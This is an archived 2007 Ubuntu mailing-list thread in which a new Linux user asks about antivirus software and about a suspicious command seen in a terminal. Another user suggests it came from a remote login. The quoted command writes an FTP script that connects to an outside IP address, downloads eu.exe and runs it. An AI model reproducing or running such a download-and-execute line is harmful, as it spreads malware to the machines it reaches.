Antivirus program for ubuntu feisty amd64

Lucio M Nicolosi lmario at philippe.com.br
Sat May 12 05:32:48 UTC 2007


cj wrote:
> Lucio M Nicolosi wrote:
>   
>> Mario Vukelic wrote:
>>   
>>     
>>>> You would not have had any infections on Linux without the antivir
>>>> program either, since there are no Linux viruses in the wild :)
>>>>       
>>>>         
>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office 
>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy 
>> and Firewall).
>>
>> A couple of days ago noticed an application suddenly taking control of 
>> the terminal window and running the following script:
>>
>> (user)@phil:~$ 5~.~
>>
>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>>
>> (user)@phil:~$ cmd /c echo open 201.27.157.123 42043 >> ik     &echo 
>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik 
>> &del ik &eu.exe &exit
>>
>> from the script "ik" in /home/(user)
>>
>> Couldn't find any "ik" script in my home (Ubuntu 7.04) desktop.
>>
>> Looked like a worm, then I ran antivirus on Win partition, looked for 
>> the Windows "eu.exe" virus and variants but found no trace of it, at 
>> least on my desktop.
>>
>> Has anyone any idea of what kind of script this is?
>>
>> L.
>>
>>   
>>     
> More than likely, someone logged on to your computer (looks like they 
> did it through telnet, but I could be wrong). In that case, either hook 
> your computer into a firewall or download one for Linux (which Linux 
> doesn't really need one, but if you are using your system for large-scale 
> business, then it's a good idea to get a firewall)
>
> Sometimes I have noticed that when somebody logs on to my system and 
> runs their script (yes I was hacked once..good thing my firewall blocked 
> the attack...but it didn't catch the remote login?), it doesn't execute 
> right..just FYI..most of the time it does though, especially when DoSing.
>
> --cj
Just found a very recent reference for a "CBA Trojan" in the following link

http://www.scriptalias.com/?p=90

it describes exactly what I noticed in my Ubuntu desktop.
